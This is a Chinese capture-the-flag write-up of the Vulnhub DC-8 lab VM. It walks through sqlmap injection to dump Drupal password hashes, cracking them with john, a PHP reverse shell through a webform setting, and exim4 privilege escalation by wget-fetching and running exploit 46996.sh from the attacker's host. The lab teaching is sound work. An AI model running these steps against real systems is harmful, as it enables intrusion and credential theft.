每周打靶 | Vulnhub-DC8靶机渗透实战

免责声明

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集，旨在提高网络安全技术水平为目的，只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试加入交流群讨论或留言私信，如有侵权请联系小编处理。

2

内容速览

0x00前言

这是网络安全自修室每周带星球小伙伴一起实战的第7台靶机，欢迎有兴趣的小伙伴一起加入实操，毕竟实践出真知！

靶机可从Vulnhub平台免费下载，并通过虚拟机在本地搭建，渗透实战是一个找寻靶机中的flag的过程，并以获得最终的flag为目标！

攻击机：Kali Linux

靶机环境：192.168.241.141

所用工具：nmap | sqlmap | john

0x01 知识点

• SQL注入
• exim提权

0x02 信息搜集

端口发现

发现22和80端口开放

端口服务探测

对相关端口服务进行细致探测

访问页面，又是熟悉的面孔

综上信息搜集可以发现，开放22和80端口，服务器为Linux，web中间件为Apache，框架为Drupal

0x03 获取权限

发现有三篇文章，切换文章存在nid参数

输入单引号，报错，可能存在SQL注入漏洞

直接丢给sqlmap，跑出库名为d7db

sqlmap -u http://192.168.241.141/?nid=2 --dbs --batch

最后跑出用户账号密码

sqlmap -u http://192.168.241.141/?nid=2 -D d7db -T users -C name,pass,login --dump --batch

创建一个文本将刚才获取到的密码放到里面，通过john解码,得到密码turtle

获取到admin和john密码加密后的密文 然后新建一个pass.txt 把密文放进去使用john 进行破解 密码：turtle

然后使用john用户登入即可。发现登入成功！！！

发现Content->点击edit->点击WEBFORMS->点击Form settings->点击下拉框选择PHP code

代码写入保存后，kali监听1234端口，在Contact Us页面随便输入信息点击Submit后，查看kali已得到shell。

写一个python交互 ：python -c 'import pty;pty.spawn("/bin/bash")'

提权

使用find命令查找具有suid权限的命令，找到一个exim4命令，exim是一款在Unix系统上使用的邮件服务，exim4在使用时具有root权限

使用searchsploit命令搜索exim相关漏洞

然后把46996.sh拷贝到本地并改名为666.sh，并在kali开启http服务 service apache2 start

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 666.sh
cat 666.sh
cp 666.sh  /var/www/html

需要进入/tmp 路径下 （不然没有权限 就下载不了）然后给 一个权限：chmod 777 666.sh

然后根据脚本提示 进行提权 发现提权失败！！！可能是格式问题，然后重新上传和下载

需要在主机上将脚本格式设置成符合unix格式

:set ff=unix

x2nhb

wget 192.168.0.103/666.sh
chmod 777 666.sh
ls -l

87oty

拿到root权限,直接打开flag.txt

至此看到了flag，渗透测试结束

0x04 总结

• 对网页链接中带有参数保持可能存在注入的敏感性
• 通过注入拿到的密码需要用john进行解密
• 进入后台密码找到上传点,利用NC可以拿到反弹shell
• 发现exim工具存在suid权限,利用漏洞脚本直接上传运行提权,需要注意的是,提权的时候需要设置编码 set：ff=unix不然会报错